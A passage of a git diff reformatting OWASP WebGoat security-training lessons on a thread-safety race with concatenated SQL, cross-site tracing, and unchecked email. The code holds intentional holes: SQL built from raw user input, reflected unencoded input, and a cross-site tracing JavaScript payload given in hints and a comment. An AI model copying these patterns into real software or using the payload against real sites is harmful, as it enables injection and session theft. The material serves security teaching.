- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class ThreadSafetyProblem extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    private final static String USER_NAME = "username";
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    private static String currentUser;
+	private final static String USER_NAME = "username";
 
-    private String originalUser;
+	private static String currentUser;
 
+	private String originalUser;
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-		Connection connection = DatabaseUtilities.getConnection(s);
+		ElementContainer ec = new ElementContainer();
 
-	    ec.addElement(new StringElement("Enter user name: "));
-	    ec.addElement(new Input(Input.TEXT, USER_NAME, ""));
-	    currentUser = s.getParser().getRawParameter(USER_NAME, "");
-	    originalUser = currentUser;
-
-	    // Store the user name
-	    String user1 = new String(currentUser);
-
-	    Element b = ECSFactory.makeButton("Submit");
-	    ec.addElement(b);
-	    ec.addElement(new P());
-
-	    if (!"".equals(currentUser))
-	    {
-		Thread.sleep(1500);
-
-		// Get the users info from the DB
-		String query = "SELECT * FROM user_system_data WHERE user_name = '"
-			+ currentUser + "'";
-		Statement statement = connection.createStatement(
-			ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		ResultSet results = statement.executeQuery(query);
-
-		if ((results != null) && (results.first() == true))
+		try
 		{
-		    ec.addElement("Account information for user: "
-			    + originalUser + "<br><br>");
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
-		}
-		else
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			ec.addElement(new StringElement("Enter user name: "));
+			ec.addElement(new Input(Input.TEXT, USER_NAME, ""));
+			currentUser = s.getParser().getRawParameter(USER_NAME, "");
+			originalUser = currentUser;
+
+			// Store the user name
+			String user1 = new String(currentUser);
+
+			Element b = ECSFactory.makeButton("Submit");
+			ec.addElement(b);
+			ec.addElement(new P());
+
+			if (!"".equals(currentUser))
+			{
+				Thread.sleep(1500);
+
+				// Get the users info from the DB
+				String query = "SELECT * FROM user_system_data WHERE user_name = '" + currentUser + "'";
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																	ResultSet.CONCUR_READ_ONLY);
+				ResultSet results = statement.executeQuery(query);
+
+				if ((results != null) && (results.first() == true))
+				{
+					ec.addElement("Account information for user: " + originalUser + "<br><br>");
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+				}
+				else
+				{
+					s.setMessage("'" + currentUser + "' is not a user in the WebGoat database.");
+				}
+			}
+			if (!user1.equals(currentUser))
+			{
+				makeSuccess(s);
+			}
+
+		} catch (Exception e)
 		{
-		    s.setMessage("'" + currentUser
-			    + "' is not a user in the WebGoat database.");
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-	    }
-	    if (!user1.equals(currentUser))
-	    {
-		makeSuccess(s);
-	    }
 
+		return (ec);
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the hints attribute of the ConcurrencyScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		List<String> hints = new ArrayList<String>();
+		hints.add("Web applications handle many HTTP requests at the same time.");
+		hints.add("Developers use variables that are not thread safe.");
+		hints.add("Show the Java source code and trace the 'currentUser' variable");
+		hints.add("Open two browsers and send 'jeff' in one and 'dave' in the other.");
+
+		return hints;
 	}
 
-	return (ec);
-    }
-
-
-    /**
-     *  Gets the hints attribute of the ConcurrencyScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Web applications handle many HTTP requests at the same time.");
-	hints.add("Developers use variables that are not thread safe.");
-	hints
-		.add("Show the Java source code and trace the 'currentUser' variable");
-	hints
-		.add("Open two browsers and send 'jeff' in one and 'dave' in the other.");
-
-	return hints;
-    }
-
-
-    /**
-     *  Gets the instructions attribute of the ThreadSafetyProblem object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-
-	String instructions = "The user should be able to exploit the concurrency error in this web application "
-		+ "and view login information for another user that is attempting the same function "
-		+ "at the same time.  <b>This will require the use of two browsers</b>. Valid user "
-		+ "names are 'jeff' and 'dave'."
-		+ "<p>Please enter your username to access your account.";
-
-	return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(80);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    protected Category getDefaultCategory()
-    {
-	return Category.CONCURRENCY;
-    }
-
-
-    /**
-     *  Gets the title attribute of the ConcurrencyScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Thread Safety Problems");
-    }
-
-
-    /**
-     *  Constructor for the ConcurrencyScreen object
-     *
-     * @param  s  Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-	try
+	/**
+	 * Gets the instructions attribute of the ThreadSafetyProblem object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
 	{
-	    super.handleRequest(s);
+
+		String instructions = "The user should be able to exploit the concurrency error in this web application "
+				+ "and view login information for another user that is attempting the same function "
+				+ "at the same time.  <b>This will require the use of two browsers</b>. Valid user "
+				+ "names are 'jeff' and 'dave'." + "<p>Please enter your username to access your account.";
+
+		return (instructions);
 	}
-	catch (Exception e)
+
+	private final static Integer DEFAULT_RANKING = new Integer(80);
+
+	protected Integer getDefaultRanking()
 	{
-	    System.out.println("Exception caught: " + e);
-	    e.printStackTrace(System.out);
+		return DEFAULT_RANKING;
+	}
+
+	protected Category getDefaultCategory()
+	{
+		return Category.CONCURRENCY;
+	}
+
+	/**
+	 * Gets the title attribute of the ConcurrencyScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Thread Safety Problems");
+	}
+
+	/**
+	 * Constructor for the ConcurrencyScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void handleRequest(WebSession s)
+	{
+		try
+		{
+			super.handleRequest(s);
+		} catch (Exception e)
+		{
+			System.out.println("Exception caught: " + e);
+			e.printStackTrace(System.out);
+		}
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
 	}
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java
index 5202afafb..9640d8b3e 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.BR;
@@ -19,268 +19,239 @@ import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 
 public class TraceXSS extends LessonAdapter
 {
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-    protected Element createContent(WebSession s)
-    {
-
-	ElementContainer ec = new ElementContainer();
-	String regex1 = "^[0-9]{3}$";// any three digits
-	Pattern pattern1 = Pattern.compile(regex1);
-
-	try
+	protected Element createContent(WebSession s)
 	{
-	    String param1 = s.getParser().getRawParameter("field1", "111");
-	    String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
-		    "field2", "4128 3214 0002 1999"));
-	    float quantity = 1.0f;
-	    float total = 0.0f;
-	    float runningTotal = 0.0f;
 
-	    // test input field1
-	    if (!pattern1.matcher(param1).matches())
-	    {
-		if (param1.toLowerCase().indexOf("script") != -1
-			&& param1.toLowerCase().indexOf("trace") != -1)
+		ElementContainer ec = new ElementContainer();
+		String regex1 = "^[0-9]{3}$";// any three digits
+		Pattern pattern1 = Pattern.compile(regex1);
+
+		try
 		{
-		    makeSuccess(s);
+			String param1 = s.getParser().getRawParameter("field1", "111");
+			String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
+			float quantity = 1.0f;
+			float total = 0.0f;
+			float runningTotal = 0.0f;
+
+			// test input field1
+			if (!pattern1.matcher(param1).matches())
+			{
+				if (param1.toLowerCase().indexOf("script") != -1 && param1.toLowerCase().indexOf("trace") != -1)
+				{
+					makeSuccess(s);
+				}
+
+				s.setMessage("Whoops! You entered " + param1 + " instead of your three digit code.  Please try again.");
+			}
+
+			// FIXME: encode output of field2, then s.setMessage( field2 );
+
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+			tr.addElement(new TH().addElement("Total").setWidth("7%"));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+			tr.addElement(new TD().addElement("69.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY1", 1.0f);
+			total = quantity * 69.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
+			tr.addElement(new TD().addElement("27.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY2", 1.0f);
+			total = quantity * 27.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
+			tr.addElement(new TD().addElement("1599.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY3", 1.0f);
+			total = quantity * 1599.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
+			tr.addElement(new TD().addElement("299.99").setAlign("right"));
+
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY4", 1.0f);
+			total = quantity * 299.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+
+			ec.addElement(t);
+
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("The total charged to your credit card:"));
+			tr.addElement(new TD().addElement("$" + runningTotal));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your credit card number:"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2)));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your three digit access code:"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1", param1)));
+			t.addElement(tr);
+
+			Element b = ECSFactory.makeButton("Purchase");
+			tr = new TR();
+			tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
+			t.addElement(tr);
+
+			ec.addElement(t);
+			ec.addElement(new BR());
+			ec.addElement(new HR().setWidth("90%"));
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
-
-		s
-			.setMessage("Whoops! You entered "
-				+ param1
-				+ " instead of your three digit code.  Please try again.");
-	    }
-
-	    // FIXME: encode output of field2, then s.setMessage( field2 );
-
-	    ec.addElement(new HR().setWidth("90%"));
-	    ec.addElement(new Center().addElement(new H1()
-		    .addElement("Shopping Cart ")));
-	    Table t = new Table().setCellSpacing(0).setCellPadding(2)
-		    .setBorder(1).setWidth("90%").setAlign("center");
-
-	    if (s.isColor())
-	    {
-		t.setBorder(1);
-	    }
-
-	    TR tr = new TR();
-	    tr.addElement(new TH().addElement(
-		    "Shopping Cart Items -- To Buy Now").setWidth("80%"));
-	    tr.addElement(new TH().addElement("Price").setWidth("10%"));
-	    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-	    tr.addElement(new TH().addElement("Total").setWidth("7%"));
-	    t.addElement(tr);
-
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-	    tr.addElement(new TD().addElement("69.99").setAlign("right"));
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY1", s.getParser()
-			    .getStringParameter("QTY1", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY1", 1.0f);
-	    total = quantity * 69.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr.addElement(new TD()
-		    .addElement("Dynex - Traditional Notebook Case"));
-	    tr.addElement(new TD().addElement("27.99").setAlign("right"));
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY2", s.getParser()
-			    .getStringParameter("QTY2", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY2", 1.0f);
-	    total = quantity * 27.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
-	    tr.addElement(new TD().addElement("1599.99").setAlign("right"));
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY3", s.getParser()
-			    .getStringParameter("QTY3", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY3", 1.0f);
-	    total = quantity * 1599.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("3 - Year Performance Service Plan $1000 and Over "));
-	    tr.addElement(new TD().addElement("299.99").setAlign("right"));
-
-	    tr.addElement(new TD().addElement(
-		    new Input(Input.TEXT, "QTY4", s.getParser()
-			    .getStringParameter("QTY4", "1")))
-		    .setAlign("right"));
-	    quantity = s.getParser().getFloatParameter("QTY4", 1.0f);
-	    total = quantity * 299.99f;
-	    runningTotal += total;
-	    tr.addElement(new TD().addElement("$" + total));
-	    t.addElement(tr);
-
-	    ec.addElement(t);
-
-	    t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		    .setWidth("90%").setAlign("center");
-
-	    if (s.isColor())
-	    {
-		t.setBorder(1);
-	    }
-
-	    ec.addElement(new BR());
-
-	    tr = new TR();
-	    tr.addElement(new TD()
-		    .addElement("The total charged to your credit card:"));
-	    tr.addElement(new TD().addElement("$" + runningTotal));
-	    tr.addElement(new TD().addElement(ECSFactory
-		    .makeButton("Update Cart")));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr
-		    .addElement(new TD()
-			    .addElement("Enter your credit card number:"));
-	    tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2",
-		    param2)));
-	    t.addElement(tr);
-	    tr = new TR();
-	    tr.addElement(new TD()
-		    .addElement("Enter your three digit access code:"));
-	    tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",
-		    param1)));
-	    t.addElement(tr);
-
-	    Element b = ECSFactory.makeButton("Purchase");
-	    tr = new TR();
-	    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign(
-		    "center"));
-	    t.addElement(tr);
-
-	    ec.addElement(t);
-	    ec.addElement(new BR());
-	    ec.addElement(new HR().setWidth("90%"));
+		return (ec);
 	}
-	catch (Exception e)
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return Category.XSS;
 	}
-	return (ec);
-    }
 
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Most web servers support GET/POST.  Many default installations also support TRACE");
+		hints.add("JavaScript has the ability to post a URL:<br>"
+				+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
+				+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"GET\", \"./\", false);"
+				+ " xmlHttp.send();str1=xmlHttp.responseText;  " + "document.write(str1);&lt;/script&gt;");
+		hints.add("Try changing the HTTP GET to a HTTP TRACE");
+		hints
+				.add("Try a cross site trace (XST) Command:<br>"
+						+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
+						+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);"
+						+ " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"&lt;br&gt;\"); "
+						+ "document.write(str1);}&lt;/script&gt;");
+		return hints;
+	}
 
-    /**
-     *  DOCUMENT ME!
-     *
-     * @return    DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.XSS;
-    }
+	// <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp
+	// = new
+	// ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
+	// xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
 
+	private final static Integer DEFAULT_RANKING = new Integer(130);
 
-    /**
-     *  Gets the hints attribute of the AccessControlScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Most web servers support GET/POST.  Many default installations also support TRACE");
-	hints
-		.add("JavaScript has the ability to post a URL:<br>"
-			+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
-			+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"GET\", \"./\", false);"
-			+ " xmlHttp.send();str1=xmlHttp.responseText;  "
-			+ "document.write(str1);&lt;/script&gt;");
-	hints.add("Try changing the HTTP GET to a HTTP TRACE");
-	hints
-		.add("Try a cross site trace (XST) Command:<br>"
-			+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
-			+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);"
-			+ " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"&lt;br&gt;\"); "
-			+ "document.write(str1);}&lt;/script&gt;");
-	return hints;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    //	<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
-
-    private final static Integer DEFAULT_RANKING = new Integer(130);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the AccessControlScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Cross Site Tracing (XST) Attacks");
-    }
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Cross Site Tracing (XST) Attacks");
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java
index 75b9036fd..fb63dcba8 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.text.Format;
@@ -7,7 +8,6 @@ import java.util.Arrays;
 import java.util.Date;
 import java.util.List;
 import java.util.Properties;
-
 import javax.mail.Message;
 import javax.mail.MessagingException;
 import javax.mail.PasswordAuthentication;
@@ -15,7 +15,6 @@ import javax.mail.Session;
 import javax.mail.Transport;
 import javax.mail.internet.InternetAddress;
 import javax.mail.internet.MimeMessage;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -34,32 +33,31 @@ import org.apache.ecs.html.TextArea;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -121,7 +119,8 @@ public class UncheckedEmail extends LessonAdapter
 				{
 					Message sentMessage = sendGoogleMail(to, subject, message, emailFromAddress, gId, gPass);
 					formatMail(ec, sentMessage);
-				} else
+				}
+				else
 				{
 					sendSimulatedMail(ec, to, subject, message);
 				}
@@ -132,8 +131,7 @@ public class UncheckedEmail extends LessonAdapter
 			{
 				makeSuccess(s);
 			}
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
@@ -146,7 +144,7 @@ public class UncheckedEmail extends LessonAdapter
 		try
 		{
 			ec.addElement(new Center().addElement(new B().addElement("You sent the following message to: "
-																	 + Arrays.asList(sentMessage.getAllRecipients()))));
+					+ Arrays.asList(sentMessage.getAllRecipients()))));
 			ec.addElement(new BR());
 			ec.addElement(new StringElement("<b>MAIL FROM:</b> " + Arrays.asList(sentMessage.getReplyTo())));
 			ec.addElement(new BR());
@@ -154,7 +152,7 @@ public class UncheckedEmail extends LessonAdapter
 			ec.addElement(new BR());
 			ec
 					.addElement(new StringElement("<b>Message-ID:</b> "
-												  + Arrays.asList(sentMessage.getHeader("Message-ID"))));
+							+ Arrays.asList(sentMessage.getHeader("Message-ID"))));
 			ec.addElement(new BR());
 			ec.addElement(new StringElement("<b>Date:</b> " + sentMessage.getSentDate()));
 			ec.addElement(new BR());
@@ -164,8 +162,7 @@ public class UncheckedEmail extends LessonAdapter
 			ec.addElement(new BR());
 			ec.addElement(new BR());
 			ec.addElement(new StringElement(sentMessage.getContent().toString()));
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			// TODO Auto-generated catch block
 			ec.addElement(new StringElement("Fatal error while sending message"));
@@ -241,13 +238,13 @@ public class UncheckedEmail extends LessonAdapter
 
 		tr = new TR();
 		tr.addElement(new TD().addElement(
-										  "We value your comments.  " + "To send OWASP your questions or comments "
-												  + "regarding the WebGoat tool, please enter your "
-												  + "comments below.  The information you provide will be "
